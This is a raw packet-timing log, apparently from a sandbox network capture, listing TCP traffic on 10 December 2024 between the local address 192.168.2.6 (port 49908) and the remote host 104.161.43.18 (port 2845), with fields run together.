                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.093916893 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.093957901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.094083071 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.094789982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.094916105 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.094969034 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.095932007 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.096052885 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.096132994 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.096851110 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.096962929 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.097012997 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.097898006 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.097986937 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.098402977 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.098968029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.099092960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.099283934 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.099951982 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.100084066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.100188017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.100977898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.101067066 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.101150036 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.102032900 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.102066040 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.102235079 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.103075981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.103137016 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.104105949 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.104135036 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.104196072 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.105165005 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.105178118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.105262995 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.105423927 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.106132984 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.106296062 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.106465101 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.107347012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.107424974 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.107523918 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.108197927 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.108268976 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.108369112 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.108891964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.108952045 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.109015942 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.109610081 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.109735012 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.109817028 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.110728979 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.110743046 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.110795975 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.111767054 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.111779928 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.111819029 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.250525951 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.250621080 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.250782013 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.250973940 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.251195908 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.252008915 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.252031088 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.252065897 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.252945900 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.253037930 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.253169060 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.253266096 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.254045963 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.254188061 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.254277945 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.255204916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.255279064 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.255985022 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.256232977 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.256406069 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.256604910 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.257185936 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.257247925 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.257653952 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.258189917 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.258265972 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.258331060 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.259202003 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.259325981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.259521961 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.260242939 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.260354996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.261259079 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.261329889 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.261353016 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.261445045 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.262311935 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.262346029 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.262439966 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.263366938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.263417959 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.263665915 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.264405966 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.264564037 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.265217066 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.265372992 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.265487909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.265729904 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.266529083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.266541958 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.266623974 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.267478943 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.267543077 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.267776966 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.268491983 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.268629074 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.268686056 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.269762039 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.269773960 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.269875050 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.270497084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.270977974 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.271532059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.271558046 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.271600962 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.271667957 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.272561073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.272690058 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.272885084 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.273603916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.273756981 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.273828030 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.274616957 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.274841070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.275706053 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.275749922 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.275768042 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.275862932 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.276767969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.276894093 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.277717113 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.277857065 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.277883053 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.278462887 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.278753996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.278884888 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.278968096 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.279923916 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.279944897 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.280038118 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.280793905 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.280960083 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.281011105 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.281841993 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.281949043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.282345057 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.282898903 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.283041954 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.283246040 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.283934116 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.284001112 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.284100056 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.284918070 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.285021067 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.285674095 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.285950899 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.286078930 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.286386967 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.287003040 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.287168026 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.287277937 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.288073063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.288184881 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.288393021 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.289252043 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.289396048 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.290218115 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.290461063 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.290462017 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.290577888 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.291286945 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.291352034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.291676044 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.292164087 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.292249918 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.292385101 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.293165922 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.293247938 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.293387890 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.294131994 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.294264078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.294873953 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.295216084 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.295361996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.296188116 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.296319008 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.296391964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.296490908 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.297293901 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.297445059 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.298368931 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.298381090 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.298398018 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.298821926 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.299438953 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.299483061 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.299563885 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301100969 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301117897 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301131964 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301148891 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301167965 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.301309109 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.302112103 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.302222013 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.303160906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.303215027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.303241014 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.303782940 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.304086924 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.355267048 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.442528009 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.442645073 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.443013906 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.443068027 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.443093061 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.443595886 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.443711996 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.444369078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.444437981 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.445310116 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.445324898 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.445461988 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.445966005 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.446199894 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.446860075 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.446877956 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.447674990 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.447813034 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.447951078 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.448914051 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.448928118 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.448947906 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.449853897 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.449893951 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.450002909 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.450897932 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.450932026 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.450997114 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.451607943 CET499082845192.168.2.6104.161.43.18
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.452001095 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.452022076 CET284549908104.161.43.18192.168.2.6
                                                                                                                                                                                                                                                                                                                        Dec 10, 2024 18:41:14.452142000 CET499082845192.168.2.6104.161.43.18
